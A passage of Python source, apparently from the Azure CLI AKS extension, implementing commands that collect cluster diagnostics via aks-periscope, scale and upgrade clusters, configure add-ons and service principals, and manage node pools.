raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
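    """Collect diagnostic information from the cluster by deploying the aks-periscope daemon set
    and uploading the results to the given (or discovered) storage account.
    """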
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
        raise CLIError('Cannot find the kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
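        # No SAS token supplied: derive one from the storage account keys. A read/write token is
        # embedded in the periscope deployment for uploading logs, and a read-only token is used
        # for the shareable results URL printed at the end.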
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
    # Form the container name from the FQDN, as before; only the location of this code has changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
    # use find() so a missing "-hcp-" marker yields -1 instead of raising ValueError
    len_of_container_name = normalized_container_name.find("-hcp-")
    if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace(
"# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace(
"# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(
curr_dir, "deploymentyaml", "aks-periscope.yaml")
yaml_file = open(periscope_yaml_file, "r")
data_loaded = yaml_file.read()
return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
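    """Scale the node count of a node pool in the managed cluster."""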
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the node pool name or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
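    """Upgrade the cluster's Kubernetes version and/or node image versions, optionally
    restricting the upgrade to the control plane only.
    """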
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node image version, please use the "--node-image-only" option.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This is only a client-side convenience so customers can run "az aks upgrade" to upgrade all
        # node pools of a cluster. The SDK only supports upgrading a single node pool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. The node-image-only upgrade operation '
                               'can only be applied to VirtualMachineScaleSets clusters.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
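    """Upgrade only the node image of a single node pool; a snapshot id, when provided, is passed
    to the service via the AKSSnapshotId header.
    """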
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
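    """Translate the comma-separated addons string into a dictionary of ManagedClusterAddonProfile
    objects, validating addon-specific arguments along the way.
    """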
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={
CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
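    """Load a cached service principal from aksServicePrincipal.json or create a new one,
    then persist and return it.
    """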
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
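    """Validate the min-count/max-count/node-count combination and, when the cluster autoscaler
    is enabled, apply the corresponding settings to the agent pool profile.
    """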
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
                'Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
                'min-count and max-count can only be specified together with --enable-cluster-autoscaler; please add that flag or remove them')
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
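    """Resolve the ACR by resource id or by name across resource groups, then create (or delete,
    when detaching) the 'acrpull' role assignment for the given client id.
    """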
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
no_wait=False):
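    """Add a new node pool to the managed cluster."""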
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
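        # inherit any unspecified settings (Kubernetes version, OS type/SKU, VM size) from the snapshot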
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
                    'Taint does not match allowed values. Expected a value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData,
host_group_id=host_group_id,
capacity_reservation_group_id=crg_id
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
if message_of_the_day:
agent_pool.message_of_the_day = _get_message_of_the_day(
message_of_the_day)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node image version, please use the "--node-image-only" option.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False):
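    """Update node pool properties such as autoscaler settings, tags, labels, taints, mode,
    scale-down mode and max surge.
    """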
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
        reconcilePrompt = 'No argument was specified to update. Would you like to reconcile to the current settings?'
if not prompt_y_n(reconcilePrompt, default="n"):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
                        'Taint does not match allowed values. Expected a value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
